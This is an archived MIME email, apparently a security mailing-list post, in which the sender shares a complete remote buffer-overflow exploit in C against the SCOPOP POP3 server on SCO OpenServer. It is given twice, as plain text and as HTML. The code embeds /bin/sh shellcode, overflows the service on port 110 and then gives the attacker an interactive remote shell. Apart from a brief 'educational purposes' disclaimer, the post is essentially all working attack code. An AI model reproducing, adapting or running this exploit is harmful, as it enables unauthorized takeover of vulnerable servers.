This is a multi-part message in MIME format. ------=_NextPart_000_00FF_01BDAFEE.186CC260 Content-Type: text/plain; charset="koi8-r" Content-Transfer-Encoding: quoted-printable Hello. Here is my ( ??:) ) exploit for SCOPOP server.=20 Offset 0 is for version 2.1.4-R3. =20 ASM string was little modified for SCO syscall style. Tested on SCO Open Server 5.0.4. FOR EDUCATIONAL PURPOSES ONLY. ------------------------CUT------------------------- /* * Remote pop exploit for SCO systems. * by glitch of litecrew. * Ripped from Miroslaw Grzybek's code. */ #include <stdio.h> #include <stdlib.h> #include <sys/time.h> #include <sys/types.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h>=20 #include <netdb.h> #include <sys/errno.h> char *shell=3D "\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17" "\x88\x5e\x1c\x8d\x16\x89\x56\x0e\x31\xc0\xb0\x3b\x8d\x7e" "\x12\x89\xf9\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89" "\xcf\xeb\x01\xff\x63\x61\x62\x62\xeb\x1b\xe8\xc9\xff\xff" "\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb" "\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa"; #define ADDR 0x80474b4 #define OFFSET 0 #define BUFLEN 1200 char buf[BUFLEN]; int offset=3DOFFSET; int nbytes; int sock; struct sockaddr_in sa; struct hostent *hp; short a; void main (int argc, char *argv[]) { int i; if(argc<2) { printf("Usage: %s <IP | HOSTNAME> [offset]\n",argv[0]); printf("Default offset is 0. 
It works against SCOPOP = v2.1.4-R3\n"); exit(0); } if(argc>2) offset=3Datoi(argv[2]); memset(buf,0x90,BUFLEN); memcpy(buf+800,shell,strlen(shell)); for(i=3D901;i<BUFLEN-4;i+=3D4) *(int *)&buf[i]=3DADDR+offset; buf[BUFLEN]=3D'\n'; if((hp=3D(struct hostent *)gethostbyname(argv[1]))=3D=3DNULL) { perror("gethostbyname()"); exit(0); } if((sock=3Dsocket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) { perror("socket()"); exit(0); } sa.sin_family=3DAF_INET; sa.sin_port=3Dhtons(110); memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length); if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=3D0) { perror("connect()"); exit(0); } printf("CONNECTED TO %s... SENDING DATA\n",argv[1]); = fflush(stdout); write(sock,buf,strlen(buf)); while(1) { fd_set input; FD_SET(0,&input); FD_SET(sock,&input); if((select(sock+1,&input,NULL,NULL,NULL))<0) { if(errno=3D=3DEINTR) continue; printf("CONNECTION CLOSED...\n"); = fflush(stdout); exit(1); } if(FD_ISSET(sock,&input)) { nbytes=3Dread(sock,buf,BUFLEN); for(i=3D0;i<nbytes;i++) { *(char *)&a=3Dbuf[i]; if ((a!=3D10)&&((a >126) || (a<32)) ){ buf[i]=3D' '; } } write(1,buf,nbytes); } if(FD_ISSET(0,&input)) write(sock,buf,read(0,buf,BUFLEN)); } } -------------------------------CUT---------------------------------------= ------=_NextPart_000_00FF_01BDAFEE.186CC260 Content-Type: text/html; charset="koi8-r" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD W3 HTML//EN"> <HTML> <HEAD> <META content=3Dtext/html;charset=3Dkoi8-r http-equiv=3DContent-Type> <META content=3D'"MSHTML 4.72.3110.7"' name=3DGENERATOR> </HEAD> <BODY bgColor=3D#ffffff> <DIV><FONT color=3D#000000 size=3D2>Hello.</FONT></DIV> <DIV><FONT color=3D#000000 size=3D2> Here is my ( ??:) = )=20 exploit for SCOPOP server. </FONT></DIV> <DIV><FONT size=3D2>Offset 0 is for version 2.1.4-R3. 
= </FONT></DIV> <DIV><FONT size=3D2>ASM string was little modified for SCO syscall=20 style.</FONT></DIV> <DIV><FONT size=3D2>Tested on SCO Open Server 5.0.4.</FONT></DIV> <DIV><FONT size=3D2></FONT> </DIV> <DIV><FONT size=3D2>FOR EDUCATIONAL PURPOSES ONLY.</FONT></DIV> <DIV><FONT size=3D2></FONT> </DIV> <DIV><FONT=20 size=3D2>------------------------CUT-------------------------</FONT></DIV= > <DIV><FONT = size=3D2>/*<BR> * Remote=20 pop exploit for SCO=20 systems.<BR> * by glitch = of=20 litecrew.<BR> * = Ripped from=20 Miroslaw Grzybek's code.<BR> */</FONT></DIV> <DIV><FONT size=3D2></FONT> </DIV> <DIV><FONT size=3D2>#include =20 <stdio.h><BR>#include =20 <stdlib.h><BR>#include =20 <sys/time.h><BR>#include = <sys/types.h><BR>#include = =20 <unistd.h><BR>#include =20 <sys/socket.h><BR>#include  = ;=20 <netinet/in.h> = <BR>#include =20 <netdb.h><BR>#include =20 <sys/errno.h></FONT></DIV> <DIV><FONT size=3D2></FONT> </DIV> <DIV><FONT size=3D2>char=20 *shell=3D<BR>"\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x= 17"<BR>"\x88\x5e\x1c\x8d\x16\x89\x56\x0e\x31\xc0\xb0\x3b\x8d\x7= e"<BR>"\x12\x89\xf9\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89= "<BR>"\xcf\xeb\x01\xff\x63\x61\x62\x62\xeb\x1b\xe8\xc9\xff\xff&= quot;<BR>"\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb&qu= ot;<BR>"\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa";</FONT></= DIV> <DIV><FONT size=3D2></FONT> </DIV> <DIV><FONT size=3D2>#define ADDR 0x80474b4<BR>#define OFFSET = 0<BR>#define BUFLEN=20 1200</FONT></DIV> <DIV><FONT size=3D2></FONT> </DIV> <DIV><FONT size=3D2>char =20 buf[BUFLEN];<BR>int =20 offset=3DOFFSET;<BR>int =20 nbytes;<BR>int sock;<BR>struct sockaddr_in = sa;<BR>struct hostent *hp;<BR>short a;<BR>void main (int argc, = char=20 *argv[]) {<BR> int=20 i;<BR> if(argc<2)=20 {<BR> &n= bsp; =20 printf("Usage: %s <IP | HOSTNAME>=20 [offset]\n",argv[0]);<BR> &= nbsp; =20 printf("Default offset is 0. 
It works against SCOPOP=20 v2.1.4-R3\n");<BR> &n= bsp; =20 exit(0);<BR> =20 }<BR> =20 if(argc>2)<BR> &n= bsp; =20 offset=3Datoi(argv[2]);<BR> =20 memset(buf,0x90,BUFLEN);<BR> =20 memcpy(buf+800,shell,strlen(shell));<BR> &nb= sp; =20 for(i=3D901;i<BUFLEN-4;i+=3D4)<BR> = =20 *(int = *)&buf[i]=3DADDR+offset;<BR>  = ;=20 buf[BUFLEN]=3D'\n';<BR> = if((hp=3D(struct=20 hostent *)gethostbyname(argv[1]))=3D=3DNULL)=20 {<BR> &n= bsp; =20 perror("gethostbyname()");<BR> &nb= sp; =20 exit(0);<BR> =20 }<BR> =20 if((sock=3Dsocket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0)=20 {<BR> &n= bsp; =20 perror("socket()");<BR> &nbs= p; =20 exit(0);<BR> =20 }<BR> =20 sa.sin_family=3DAF_INET;<BR> =20 sa.sin_port=3Dhtons(110);<BR> =20 memcpy((char *)&sa.sin_addr,(char=20 *)hp->h_addr,hp->h_length);<BR> = =20 if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=3D0)=20 {<BR> &n= bsp; =20 perror("connect()");<BR> &nb= sp; =20 exit(0);<BR> =20 }<BR> printf("CONNECTED = TO %s...=20 SENDING DATA\n",argv[1]);=20 fflush(stdout);<BR> =20 write(sock,buf,strlen(buf));<BR>  = ;=20 while(1)=20 {<BR> &n= bsp; =20 fd_set input;</FONT></DIV> <DIV><FONT size=3D2></FONT> </DIV> <DIV><FONT=20 size=3D2> &nbs= p; =20 FD_SET(0,&input);<BR> = =20 FD_SET(sock,&input);<BR> &nb= sp; =20 if((select(sock+1,&input,NULL,NULL,NULL))<0)=20 {<BR> &n= bsp; =20 if(errno=3D=3DEINTR)=20 continue;<BR> = &= nbsp;=20 printf("CONNECTION CLOSED...\n");=20 fflush(stdout);<BR> = &= nbsp; =20 exit(1);<BR> &= nbsp; =20 }<BR> &n= bsp; =20 if(FD_ISSET(sock,&input))=20 {<BR> &n= bsp; =20 nbytes=3Dread(sock,buf,BUFLEN);<BR> &n= bsp; &nb= sp; =20 for(i=3D0;i<nbytes;i++)=20 {<BR> &n= bsp; &nb= sp; =20 *(char=20 *)&a=3Dbuf[i];<BR> &nb= sp; &nbs= p; =20 if ((a!=3D10)&&((a >126) || (a<32))=20 ){<BR> &= nbsp; &n= bsp; =20 buf[i]=3D'=20 ';<BR> &= nbsp; &n= bsp; =20 }<BR> &n= bsp; &nb= sp;=20 }<BR> &n= bsp; =20 write(1,buf,nbytes);<BR> &= nbsp; =20 }<BR> &n= bsp; =20 if(FD_ISSET(0,&input))<BR> &= nbsp; &n= bsp; =20 write(sock,buf,read(0,buf,BUFLEN));<BR> 
&nbs= p; =20 }<BR>}</FONT></DIV> <DIV><FONT=20 size=3D2>-------------------------------CUT------------------------------= ---------<BR></FONT></DIV> <DIV><FONT size=3D2></FONT> </DIV> <DIV> </DIV></BODY></HTML> ------=_NextPart_000_00FF_01BDAFEE.186CC260--